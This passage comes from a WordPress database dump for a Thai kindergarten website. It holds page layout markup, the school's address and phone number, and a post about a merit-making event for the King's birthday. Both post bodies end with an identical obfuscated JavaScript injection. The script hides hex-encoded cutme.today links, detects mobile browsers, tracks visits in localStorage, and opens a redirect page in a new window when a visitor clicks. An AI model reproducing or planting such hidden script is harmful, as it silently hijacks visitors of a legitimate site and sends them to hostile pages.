eight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:45:58','2024-07-29 11:45:58','',19,'http://watprato.ssk.in.th/?p=111',0,'revision','',0),
(112,1,'2024-07-29 18:46:46','2024-07-29 11:46:46','<!-- wp:generateblocks/image {\"uniqueId\":\"5d450463\",\"mediaId\":113,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5d450463\"><img class=\"gb-image gb-image-5d450463\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451759934_122163852500202781_3168910256563112673_n.jpg\" alt=\"\" title=\"451759934_122163852500202781_3168910256563112673_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ๒ ขอเชิญร่วมทำบุญ ตักบาตรข้าวสารอาหารแห้ง ปล่อยปลา เปิดถนนเฉลิมพระเกียรติ เนื่องในโอกาสมหามงคลเฉลิมพระชนมพรรษาครบ ๖ รอบ ๒๘ กรกฎาคม ๒๕๖๗ ณ โรงเรียนอนุบาลวัดพระโต ๒','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-4','','','2024-07-29 18:46:47','2024-07-29 11:46:47','',0,'http://watprato.ssk.in.th/?p=112',0,'post','',0),
